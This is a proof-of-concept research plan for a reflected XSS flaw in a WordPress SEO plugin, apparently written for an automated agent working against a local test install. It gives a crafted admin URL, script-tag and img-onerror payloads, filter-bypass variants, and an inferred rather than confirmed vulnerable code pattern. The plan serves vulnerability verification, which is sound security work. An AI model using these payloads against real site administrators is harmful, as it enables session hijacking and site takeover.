SEO Links Interlinking <= 1.7.9.9.1 - Reflected Cross-Site Scripting via 'google_error' Parameter

This research plan outlines the steps to analyze and exploit CVE-2025-14063, a reflected Cross-Site Scripting (XSS) vulnerability in the SEO Links Interlinking plugin for WordPress.

---

1. Vulnerability Summary

• Vulnerability: Reflected Cross-Site Scripting (XSS).
• Root Cause: The plugin fails to sanitize and escape the google_error GET parameter before echoing it back into the HTML response.
• Sink: Direct output of $_GET['google_error'] via echo or printf without using esc_html() or esc_attr().
• Affected Versions: <= 1.7.9.9.1.
• Patch: Version 1.7.9.9.2 introduces sanitization (likely sanitize_text_field) and escaping (esc_html).

2. Attack Vector Analysis

• Endpoint: An admin-side settings page or dashboard associated with the plugin.
• Vulnerable Parameter: google_error (GET).
• Authentication Level: Unauthenticated (to craft the link). The payload executes when a logged-in Administrator clicks the malicious link (Reflected XSS).
• Preconditions: The plugin must be active. The victim must be logged into the WordPress admin dashboard.

3. Code Flow (Inferred)

1. The plugin registers an admin menu page via add_menu_page() or add_submenu_page().
2. The callback function for this page (or a function hooked to admin_init or admin_notices) checks for the existence of the google_error parameter in the $_GET superglobal.
3. The code likely looks like this:

   // Inferred vulnerable code pattern
   if ( isset( $_GET['google_error'] ) ) {
       echo '<div class="notice notice-error"><p>' . $_GET['google_error'] . '</p></div>';
   }
   

4. The browser renders the raw HTML provided in the URL, executing any injected <script> tags.

4. Nonce Acquisition Strategy

Reflected XSS in a GET parameter on a display-only page typically does not require a nonce. Nonces in WordPress are primarily used for state-changing operations (CSRF protection).

However, to reach the vulnerable page, the victim must be logged in. For an automated POC:

1. Use browser_navigate to log in as an administrator.
2. Access the admin dashboard to ensure the session is active.
3. Navigate to the vulnerable URL directly.

5. Exploitation Strategy

The goal is to trigger an alert box to prove script execution.

• Vulnerable URL (Inferred): http://localhost:8080/wp-admin/admin.php?page=seo-links-interlinking&google_error=PAYLOAD
• Payload: <script>alert(document.domain)</script>
• Encoded Payload: %3Cscript%3Ealert(document.domain)%3C/script%3E

Step-by-Step:

1. Identify Admin Slug: Use grep -rn "add_menu_page" . to find the exact page slug (expected: seo-links-interlinking).
2. Locate Sink: Search for the parameter usage: grep -rn "google_error" ..
3. Construct URL: Combine the admin base URL, the plugin slug, and the malicious parameter.
4. Execute via Browser: Use the browser_navigate tool to simulate an admin clicking the link.

6. Test Data Setup

1. Install Plugin: Use WP-CLI to install and activate the plugin.

   wp plugin install seo-links-interlinking --version=1.7.9.9.1 --activate
   

2. Create Admin: Ensure a standard admin user exists (default: admin / password).
3. Plugin Config: Some plugins only show errors if certain features (like Google Search Console integration) are initiated. Check if the code path for google_error is always reachable.

7. Expected Results

• Upon navigating to the crafted URL, the browser should execute the JavaScript.
• An alert box containing the domain name (localhost) should appear.
• The HTML source of the page should contain the raw, unescaped payload within a <div> or <p> tag.

8. Verification Steps

1. Manual Verification: Use browser_eval("window.location.href") to ensure the agent is on the correct page.
2. DOM Inspection: Check if the script tag exists in the DOM:

   browser_eval("document.body.innerHTML.includes('<script>alert')")
   

3. Confirm Lack of Sanitization: View the response body of the HTTP request and verify that < and > characters are not converted to < and >.

9. Alternative Approaches

If the simple script tag is blocked by a Basic Web Application Firewall or browser-level XSS filters:

• Attribute Injection: If the parameter is reflected inside an attribute (e.g., value="..."), use: " onmouseover="alert(1)
• Event Handlers: <img src=x onerror=alert(1)>
• Bypassing sanitize_text_field: If the plugin uses sanitize_text_field but fails to use esc_html on output, certain HTML-like structures might still pass through or be broken in ways that allow execution in specific contexts (though sanitize_text_field is generally robust against tags).

10. Grep Patterns for Research

# Find where the page is registered to get the slug
grep -rn "add_menu_page" wp-content/plugins/seo-links-interlinking/

# Find the exact sink
grep -rn "google_error" wp-content/plugins/seo-links-interlinking/

# Check for any escaping functions used nearby
grep -rn "google_error" wp-content/plugins/seo-links-interlinking/ -A 5 -B 5 | grep "esc_"